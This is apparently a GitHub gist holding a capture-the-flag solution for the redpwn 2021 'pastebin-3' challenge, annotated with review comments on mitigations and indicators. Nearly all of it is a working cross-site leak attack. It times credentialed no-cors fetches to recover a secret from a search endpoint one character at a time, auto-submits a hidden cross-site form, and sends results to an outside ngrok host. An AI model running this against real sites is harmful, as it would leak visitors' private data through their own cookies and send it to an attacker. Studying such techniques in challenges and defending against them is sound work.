
@maple3142
Created July 12, 2021 19:12
redpwn 2021 pastebin-3
/**
 * Measure how long a single cross-origin request to `url` takes.
 *
 * The request is sent with `mode: 'no-cors'` and `credentials: 'include'`, so
 * the browser attaches the user's cookies for the target but hands back an
 * opaque response. The only thing this function observes is elapsed time.
 * It resolves on success and on failure alike, so it never rejects.
 *
 * Review note: a credentialed request whose duration is visible cross-site is
 * the measuring half of a timing side channel (XS-Leak). On the server side,
 * SameSite cookies or rejecting cross-site requests with Fetch Metadata
 * (`Sec-Fetch-Site`) remove the credentialed request this depends on; whether
 * the target here sets either is not visible from this script.
 *
 * @param {string} url - Address to request.
 * @returns {Promise<number>} Elapsed time as a `performance.now()` difference (milliseconds).
 */
function timeurl(url) {
  return new Promise((resolve) => {
    const startedAt = performance.now();
    // Same handler for both outcomes: the caller only wants the duration.
    const settle = () => {
      resolve(performance.now() - startedAt);
    };
    fetch(url, {
      mode: 'no-cors',
      credentials: 'include',
    })
      .then(settle)
      .catch(settle);
  });
}
/**
 * Average the duration of `n` sequential timed requests to `url`.
 *
 * Requests are issued one after another (each is awaited before the next
 * starts), and the arithmetic mean of the durations is returned. With `n = 0`
 * no request is made and the result is `NaN` (0 / 0).
 *
 * @param {string} url - Address passed to `timeurl`.
 * @param {number} [n=3] - Number of samples to take.
 * @returns {Promise<number>} Mean of the `timeurl` results.
 */
async function avgRespTime(url, n = 3) {
  let total = 0;
  let remaining = n;
  while (remaining > 0) {
    const elapsed = await timeurl(url);
    total += elapsed;
    remaining -= 1;
  }
  return total / n;
}
/**
 * Print the arguments to the console and send them to the author's collector.
 *
 * The arguments array is appended to the URL by string concatenation, which
 * coerces it to a comma-joined string; nothing is URL-encoded. A failed
 * request is swallowed: the returned promise resolves with the error instead
 * of rejecting.
 *
 * Review note: this is the script's only exfiltration path. Outbound requests
 * from a page to a tunnel host carrying a `?log=` parameter are the network
 * indicator to look for when analysing traffic produced by this script.
 *
 * @param {...*} args - Values to report.
 * @returns {Promise<*>} The fetch result, or the caught error.
 */
function log(...args) {
  console.log(...args);
  const reportUrl = 'https://9a5c8db108b9.ngrok.io?log=' + args;
  return fetch(reportUrl).catch((err) => err);
}
/**
 * Submit `paste` to the challenge's create_paste endpoint from a hidden frame.
 *
 * Builds an iframe whose `srcdoc` holds a POST form plus a one-line script
 * that submits it, then attaches the iframe to the current document. The
 * `paste` text is interpolated into the markup as-is (no HTML escaping), so
 * it is only safe for values the caller fully controls.
 *
 * Review note: this is a cross-site form POST made on the visitor's behalf.
 * Nothing in the form carries an anti-CSRF token; whether the endpoint
 * requires one is not visible from this script.
 *
 * @param {string} paste - Text placed inside the form's textarea.
 * @returns {undefined}
 */
function createPaste(paste) {
  const frame = document.createElement('iframe');
  const autoSubmitForm = `<form id=frm action=https://pastebin-3.mc.ax/create_paste method=post><textarea name=paste>${paste}</textarea></form><script>frm.submit()</script>`;
  frame.srcdoc = autoSubmitForm;
  document.body.appendChild(frame);
}
;(async () => {
  // Disabled by the author (labelled "increase timing accuracy"): a loop that
  // called createPaste() 10000 times with a long run of 'a' characters and
  // then log('done'). It is not executed by this script as published.

  // Sanity check: time one query that is a prefix of the flag below ('flag')
  // and one that is not ('flaga'), and report both averages.
  const prefixTime = await avgRespTime('https://pastebin-3.mc.ax/search?query=flag');
  log('TEST:flag', prefixTime);
  const nonPrefixTime = await avgRespTime('https://pastebin-3.mc.ax/search?query=flaga');
  log('TEST:flaga', nonPrefixTime);

  // Background request once a second (the author's note: "random pinging").
  // The returned promise is neither awaited nor given a rejection handler.
  setInterval(() => fetch('https://example.com'), 1000);

  // Character-by-character search over the flag alphabet. A candidate is
  // accepted when the averaged request time is below a fixed 150 cut-off
  // (performance.now() units, i.e. milliseconds).
  //
  // Review note: each position costs up to charset.length * 3 credentialed
  // requests to /search from the visitor's browser. Server-side, a burst of
  // near-identical search queries that grow by one character is the signature
  // of this technique; making the endpoint unreachable with cookies from
  // cross-site contexts is the mitigation, not tuning response times.
  const charset = '{_}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  let flag = 'flag{c00k13_b0mb1n6_15_f4k3_vuln}';
  do {
    for (const candidate of charset) {
      const guess = flag + candidate;
      const elapsed = await avgRespTime(`https://pastebin-3.mc.ax/search?query=${guess}`);
      if (elapsed < 150) {
        flag = guess;
        log(flag, elapsed);
        break;
      }
    }
    // Stops once the recovered string ends with the closing brace; if no
    // candidate is accepted in a pass, the same position is tried again.
  } while (!flag.endsWith('}'));
})()